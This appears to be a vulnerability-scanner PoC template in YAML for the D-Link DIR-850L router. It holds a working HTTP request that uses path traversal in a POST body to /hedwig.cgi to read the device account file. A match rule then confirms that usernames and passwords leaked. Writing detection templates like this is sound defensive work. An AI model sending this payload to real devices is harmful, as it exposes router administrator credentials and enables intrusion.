name: poc-yaml-dlink-850l-info-leak
binding: e49e5329-1e0e-4154-a588-fac8cac187fe
manual: true
detail:
    author: cc_ci(https://github.com/cc8ci)
    links:
        - https://xz.aliyun.com/t/2941
    vulnerability:
        id: CT-158197
        level: medium
    Affected Version: Dir-850L
transport: http
rules:
    r0:
        request:
            cache: true
            method: POST
            path: /hedwig.cgi
            headers:
                Content-Type: text/xml
                Cookie: uid=R8tBjwtFc8
            body: <?xml version="1.0" encoding="utf-8"?><postxml><module><service>../../../htdocs/webinc/getcfg/DEVICE.ACCOUNT.xml</service></module></postxml>
            follow_redirects: false
        expression: response.status == 200 && response.content_type.contains("xml") && response.body.bcontains(b"</usrid>") && response.body.bcontains(b"</password>") && response.body.bcontains(b"<result>OK</result>")
expression: r0()
